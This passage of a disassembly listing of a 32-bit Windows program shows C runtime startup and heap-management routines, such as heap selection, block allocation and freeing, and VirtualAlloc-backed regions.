movzx eax, word ptr [ebp-2Ch]
jmp short loc_42C642
; ---------------------------------------------------------------------------
loc_42C63F: ; CODE XREF: .text:0042C637�j
push 0Ah
pop eax
loc_42C642: ; CODE XREF: .text:0042C63D�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_437070 ; GetModuleHandleA
push eax
call sub_418E0F
mov [ebp-60h], eax
push eax
call sub_430B34
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_430C27
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_430B45
; =============== S U B R O U T I N E =======================================
sub_42C67C proc near ; CODE XREF: sub_42ABF8+3C�p
; sub_42AC8B+19�p ...
arg_0 = dword ptr 4
cmp dword_67692C, 1
jnz short loc_42C68A
call sub_433067
loc_42C68A: ; CODE XREF: sub_42C67C+7�j
push [esp+arg_0]
call sub_4330A0
push 0FFh
call off_451140
pop ecx
pop ecx
retn
sub_42C67C endp
; =============== S U B R O U T I N E =======================================
sub_42C6A1 proc near ; CODE XREF: .text:0042C5D9�p
; .text:0042C5EA�p
arg_0 = dword ptr 4
cmp dword_67692C, 1
jnz short loc_42C6AF
call sub_433067
loc_42C6AF: ; CODE XREF: sub_42C6A1+7�j
push [esp+arg_0]
call sub_4330A0
pop ecx
push 0FFh
call dword_4370D4 ; ExitProcess
retn
sub_42C6A1 endp
; =============== S U B R O U T I N E =======================================
sub_42C6C5 proc near ; CODE XREF: sub_4297CA+1F�p
; sub_42B39A+10D�p ...
arg_0 = dword ptr 4
mov eax, dword_676934
test eax, eax
jz short loc_42C6DD
push [esp+arg_0]
call eax ; dword_676934
test eax, eax
pop ecx
jz short loc_42C6DD
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_42C6DD: ; CODE XREF: sub_42C6C5+7�j
; sub_42C6C5+12�j
xor eax, eax
retn
sub_42C6C5 endp
; =============== S U B R O U T I N E =======================================
sub_42C6E0 proc near ; CODE XREF: sub_42C70D+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call dword_437070 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_42C70B
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_42C70B
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_42C70B: ; CODE XREF: sub_42C6E0+15�j
; sub_42C6E0+1C�j
pop esi
retn
sub_42C6E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C70D proc near ; CODE XREF: sub_42C855+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_429B60
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call dword_437050 ; GetVersionExA
test eax, eax
jz short loc_42C750
cmp [ebp+var_88], 2
jnz short loc_42C750
cmp [ebp+var_94], 5
jb short loc_42C750
push 1
pop eax
jmp loc_42C852
; ---------------------------------------------------------------------------
loc_42C750: ; CODE XREF: sub_42C70D+27�j
; sub_42C70D+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call dword_437244 ; GetEnvironmentVariableA
test eax, eax
jz loc_42C83F
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_42C792
loc_42C77F: ; CODE XREF: sub_42C70D+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_42C78D
cmp al, 7Ah
jg short loc_42C78D
sub al, 20h
mov [ecx], al
loc_42C78D: ; CODE XREF: sub_42C70D+76�j
; sub_42C70D+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_42C77F
loc_42C792: ; CODE XREF: sub_42C70D+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_42B940
add esp, 0Ch
test eax, eax
jnz short loc_42C7B4
lea eax, [ebp+var_122C]
jmp short loc_42C7FD
; ---------------------------------------------------------------------------
loc_42C7B4: ; CODE XREF: sub_42C70D+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call dword_43717C ; GetModuleFileNameA
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_42C7E8
loc_42C7D5: ; CODE XREF: sub_42C70D+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_42C7E3
cmp al, 7Ah
jg short loc_42C7E3
sub al, 20h
mov [ecx], al
loc_42C7E3: ; CODE XREF: sub_42C70D+CC�j
; sub_42C70D+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_42C7D5
loc_42C7E8: ; CODE XREF: sub_42C70D+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_42AEA0
pop ecx
pop ecx
loc_42C7FD: ; CODE XREF: sub_42C70D+A5�j
cmp eax, ebx
jz short loc_42C83F
push 2Ch
push eax
call sub_42B1A0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_42C83F
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_42C824
loc_42C816: ; CODE XREF: sub_42C70D+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_42C81F
mov [ecx], bl
jmp short loc_42C820
; ---------------------------------------------------------------------------
loc_42C81F: ; CODE XREF: sub_42C70D+10C�j
inc ecx
loc_42C820: ; CODE XREF: sub_42C70D+110�j
cmp [ecx], bl
jnz short loc_42C816
loc_42C824: ; CODE XREF: sub_42C70D+107�j
push 0Ah
push ebx
push eax
call sub_429E42
add esp, 0Ch
cmp eax, 2
jz short loc_42C852
cmp eax, 3
jz short loc_42C852
cmp eax, 1
jz short loc_42C852
loc_42C83F: ; CODE XREF: sub_42C70D+5C�j
; sub_42C70D+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_42C6E0
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_42C852: ; CODE XREF: sub_42C70D+3E�j
; sub_42C70D+126�j ...
pop ebx
leave
retn
sub_42C70D endp
; =============== S U B R O U T I N E =======================================
sub_42C855 proc near ; CODE XREF: .text:0042C5CD�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_4371F8 ; HeapCreate
test eax, eax
mov dword_677000, eax
jz short loc_42C8AB
call sub_42C70D
cmp eax, 3
mov dword_677004, eax
jnz short loc_42C891
push 3F8h
call sub_42C8B2
pop ecx
jmp short loc_42C89B
; ---------------------------------------------------------------------------
loc_42C891: ; CODE XREF: sub_42C855+2D�j
cmp eax, 2
jnz short loc_42C8AE
call sub_42D3F9
loc_42C89B: ; CODE XREF: sub_42C855+3A�j
test eax, eax
jnz short loc_42C8AE
push dword_677000
call dword_4371FC ; HeapDestroy
loc_42C8AB: ; CODE XREF: sub_42C855+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42C8AE: ; CODE XREF: sub_42C855+3F�j
; sub_42C855+48�j
push 1
pop eax
retn
sub_42C855 endp
; =============== S U B R O U T I N E =======================================
sub_42C8B2 proc near ; CODE XREF: sub_42C855+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_677000
call dword_437210 ; RtlAllocateHeap
test eax, eax
mov dword_676FF8, eax
jnz short loc_42C8CF
retn
; ---------------------------------------------------------------------------
loc_42C8CF: ; CODE XREF: sub_42C8B2+1A�j
mov ecx, [esp+arg_0]
and dword_676FF0, 0
and dword_676FF4, 0
push 1
mov dword_676FEC, eax
mov dword_676FFC, ecx
mov dword_676FE4, 10h
pop eax
retn
sub_42C8B2 endp
; =============== S U B R O U T I N E =======================================
sub_42C8FA proc near ; CODE XREF: sub_4298F2+45�p
; sub_431C83+73�p ...
arg_0 = dword ptr 4
mov eax, dword_676FF4
lea ecx, [eax+eax*4]
mov eax, dword_676FF8
lea ecx, [eax+ecx*4]
loc_42C90A: ; CODE XREF: sub_42C8FA+26�j
cmp eax, ecx
jnb short loc_42C922
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_42C924
add eax, 14h
jmp short loc_42C90A
; ---------------------------------------------------------------------------
loc_42C922: ; CODE XREF: sub_42C8FA+12�j
xor eax, eax
locret_42C924: ; CODE XREF: sub_42C8FA+21�j
retn
sub_42C8FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C925 proc near ; CODE XREF: sub_4298F2+54�p
; sub_431C83+D0�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_42CC49
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_42C9FB
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_42C989
push 3Fh
pop edx
loc_42C989: ; CODE XREF: sub_42C925+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_42C9DD
cmp edx, 20h
jnb short loc_42C9B4
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_42C9D5
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42C9D5
; ---------------------------------------------------------------------------
loc_42C9B4: ; CODE XREF: sub_42C925+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42C9D5
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42C9D5: ; CODE XREF: sub_42C925+86�j
; sub_42C925+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_42C9E0
; ---------------------------------------------------------------------------
loc_42C9DD: ; CODE XREF: sub_42C925+6A�j
mov ecx, [ebp+var_4]
loc_42C9E0: ; CODE XREF: sub_42C925+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_42C9FB: ; CODE XREF: sub_42C925+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_42CA09
push 3Fh
pop edx
loc_42CA09: ; CODE XREF: sub_42C925+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_42CAAC
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_42CA2E
mov ebx, esi
loc_42CA2E: ; CODE XREF: sub_42C925+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_42CA40
mov edx, esi
loc_42CA40: ; CODE XREF: sub_42C925+117�j
cmp ebx, edx
jz short loc_42CAA7
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_42CA8F
cmp ebx, 20h
jnb short loc_42CA70
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_42CA8F
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_42CA8F
; ---------------------------------------------------------------------------
loc_42CA70: ; CODE XREF: sub_42C925+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_42CA8F
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_42CA8F: ; CODE XREF: sub_42C925+128�j
; sub_42C925+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_42CAA7: ; CODE XREF: sub_42C925+11D�j
mov esi, [ebp+arg_4]
jmp short loc_42CAAF
; ---------------------------------------------------------------------------
loc_42CAAC: ; CODE XREF: sub_42C925+ED�j
mov ebx, [ebp+arg_0]
loc_42CAAF: ; CODE XREF: sub_42C925+185�j
cmp [ebp+var_C], 0
jnz short loc_42CABD
cmp ebx, edx
jz loc_42CB3E
loc_42CABD: ; CODE XREF: sub_42C925+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_42CB3E
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_42CB15
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42CB04
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_42CB04: ; CODE XREF: sub_42C925+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_42CB3E
; ---------------------------------------------------------------------------
loc_42CB15: ; CODE XREF: sub_42C925+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42CB2B
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_42CB2B: ; CODE XREF: sub_42C925+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_42CB3E: ; CODE XREF: sub_42C925+192�j
; sub_42C925+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_42CC49
mov eax, dword_676FF0
test eax, eax
jz loc_42CC3B
mov ecx, dword_676FE8
mov esi, dword_437198
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; dword_437198
mov ecx, dword_676FE8
mov eax, dword_676FF0
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_676FF0
mov ecx, dword_676FE8
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_676FF0
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_676FF0
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_42CBCC
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_676FF0
loc_42CBCC: ; CODE XREF: sub_42C925+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_42CC3B
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; dword_437198
mov eax, dword_676FF0
push dword ptr [eax+10h]
push 0
push dword_677000
call dword_437214 ; RtlFreeHeap
mov eax, dword_676FF4
mov edx, dword_676FF8
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_676FF0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_42BA90
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_676FF4
cmp eax, dword_676FF0
jbe short loc_42CC31
sub [ebp+arg_0], 14h
loc_42CC31: ; CODE XREF: sub_42C925+306�j
mov eax, dword_676FF8
mov dword_676FEC, eax
loc_42CC3B: ; CODE XREF: sub_42C925+234�j
; sub_42C925+2AB�j
mov eax, [ebp+arg_0]
mov dword_676FE8, edi
mov dword_676FF0, eax
loc_42CC49: ; CODE XREF: sub_42C925+38�j
; sub_42C925+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_42C925 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CC4E proc near ; CODE XREF: sub_4297F6+49�p
; sub_42B39A+78�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_676FF4
mov edx, dword_676FF8
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_42CC8E
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_42CC9E
; ---------------------------------------------------------------------------
loc_42CC8E: ; CODE XREF: sub_42CC4E+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_42CC9E: ; CODE XREF: sub_42CC4E+3E�j
mov eax, dword_676FEC
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_42CCC5
loc_42CCAC: ; CODE XREF: sub_42CC4E+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42CCC5
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_42CCAC
loc_42CCC5: ; CODE XREF: sub_42CC4E+5C�j
; sub_42CC4E+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_42CD43
mov ebx, edx
loc_42CCCC: ; CODE XREF: sub_42CC4E+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_42CCE8
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42CCE6
add ebx, 14h
jmp short loc_42CCCC
; ---------------------------------------------------------------------------
loc_42CCE6: ; CODE XREF: sub_42CC4E+91�j
cmp ebx, eax
loc_42CCE8: ; CODE XREF: sub_42CC4E+83�j
jnz short loc_42CD43
loc_42CCEA: ; CODE XREF: sub_42CC4E+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_42CD00
cmp dword ptr [ebx+8], 0
jnz short loc_42CCFD
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_42CCEA
; ---------------------------------------------------------------------------
loc_42CCFD: ; CODE XREF: sub_42CC4E+A5�j
cmp ebx, [ebp+var_4]
loc_42CD00: ; CODE XREF: sub_42CC4E+9F�j
jnz short loc_42CD28
mov ebx, edx
loc_42CD04: ; CODE XREF: sub_42CC4E+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_42CD18
cmp dword ptr [ebx+8], 0
jnz short loc_42CD16
add ebx, 14h
jmp short loc_42CD04
; ---------------------------------------------------------------------------
loc_42CD16: ; CODE XREF: sub_42CC4E+C1�j
cmp ebx, eax
loc_42CD18: ; CODE XREF: sub_42CC4E+BB�j
jnz short loc_42CD28
call sub_42CF57
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_42CD3C
loc_42CD28: ; CODE XREF: sub_42CC4E:loc_42CD00�j
; sub_42CC4E:loc_42CD18�j
push ebx
call sub_42D008
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_42CD43
loc_42CD3C: ; CODE XREF: sub_42CC4E+D8�j
xor eax, eax
jmp loc_42CF52
; ---------------------------------------------------------------------------
loc_42CD43: ; CODE XREF: sub_42CC4E+7A�j
; sub_42CC4E:loc_42CCE8�j ...
mov dword_676FEC, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_42CD6A
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42CDA1
loc_42CD6A: ; CODE XREF: sub_42CC4E+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_42CD9E
loc_42CD87: ; CODE XREF: sub_42CC4E+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_42CD87
loc_42CD9E: ; CODE XREF: sub_42CC4E+137�j
mov edx, [ebp+var_4]
loc_42CDA1: ; CODE XREF: sub_42CC4E+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_42CDCA
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_42CDCA: ; CODE XREF: sub_42CC4E+16D�j
; sub_42CC4E+183�j
test ecx, ecx
jl short loc_42CDD3
shl ecx, 1
inc edi
jmp short loc_42CDCA
; ---------------------------------------------------------------------------
loc_42CDD3: ; CODE XREF: sub_42CC4E+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_42CDF0
push 3Fh
pop esi
loc_42CDF0: ; CODE XREF: sub_42CC4E+19D�j
cmp esi, edi
jz loc_42CF05
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_42CE61
cmp edi, 20h
jge short loc_42CE30
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_42CE5E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_42CE61
; ---------------------------------------------------------------------------
loc_42CE30: ; CODE XREF: sub_42CC4E+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_42CE5E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_42CE61
; ---------------------------------------------------------------------------
loc_42CE5E: ; CODE XREF: sub_42CC4E+1D6�j
; sub_42CC4E+203�j
mov ebx, [ebp+arg_0]
loc_42CE61: ; CODE XREF: sub_42CC4E+1B0�j
; sub_42CC4E+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_42CF11
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_42CF02
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_42CED3
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_42CEC1
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_42CEC1: ; CODE XREF: sub_42CC4E+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_42CF02
; ---------------------------------------------------------------------------
loc_42CED3: ; CODE XREF: sub_42CC4E+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_42CEEC
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_42CEEC: ; CODE XREF: sub_42CC4E+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_42CF02: ; CODE XREF: sub_42CC4E+24E�j
; sub_42CC4E+283�j
mov ecx, [ebp+var_8]
loc_42CF05: ; CODE XREF: sub_42CC4E+1A4�j
test ecx, ecx
jz short loc_42CF14
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_42CF14
; ---------------------------------------------------------------------------
loc_42CF11: ; CODE XREF: sub_42CC4E+229�j
mov ecx, [ebp+var_8]
loc_42CF14: ; CODE XREF: sub_42CC4E+2B9�j
; sub_42CC4E+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_42CF4A
cmp ebx, dword_676FF0
jnz short loc_42CF4A
mov ecx, [ebp+var_4]
cmp ecx, dword_676FE8
jnz short loc_42CF4A
and dword_676FF0, 0
loc_42CF4A: ; CODE XREF: sub_42CC4E+2E0�j
; sub_42CC4E+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_42CF52: ; CODE XREF: sub_42CC4E+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_42CC4E endp
; =============== S U B R O U T I N E =======================================
sub_42CF57 proc near ; CODE XREF: sub_42CC4E+CC�p
mov eax, dword_676FF4
mov ecx, dword_676FE4
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_42CF9A
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_676FF8
push edi
push dword_677000
call dword_437160 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_42CFEA
add dword_676FE4, 10h
mov dword_676FF8, eax
mov eax, dword_676FF4
loc_42CF9A: ; CODE XREF: sub_42CF57+11�j
mov ecx, dword_676FF8
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_677000
lea esi, [ecx+eax*4]
call dword_437210 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_42CFEA
push 4
push 2000h
push 100000h
push edi
call dword_437194 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_42CFEE
push dword ptr [esi+10h]
push edi
push dword_677000
call dword_437214 ; RtlFreeHeap
loc_42CFEA: ; CODE XREF: sub_42CF57+30�j
; sub_42CF57+67�j
xor eax, eax
jmp short loc_42D005
; ---------------------------------------------------------------------------
loc_42CFEE: ; CODE XREF: sub_42CF57+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_676FF4
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_42D005: ; CODE XREF: sub_42CF57+95�j
pop edi
pop esi
retn
sub_42CF57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D008 proc near ; CODE XREF: sub_42CC4E+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_42D01A: ; CODE XREF: sub_42D008+19�j
test eax, eax
jl short loc_42D023
shl eax, 1
inc ebx
jmp short loc_42D01A
; ---------------------------------------------------------------------------
loc_42D023: ; CODE XREF: sub_42D008+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_42D038: ; CODE XREF: sub_42D008+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_42D038
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_437194 ; VirtualAlloc
test eax, eax
jnz short loc_42D06B
or eax, 0FFFFFFFFh
jmp loc_42D0FE
; ---------------------------------------------------------------------------
loc_42D06B: ; CODE XREF: sub_42D008+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_42D0B1
lea eax, [edi+10h]
loc_42D078: ; CODE XREF: sub_42D008+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
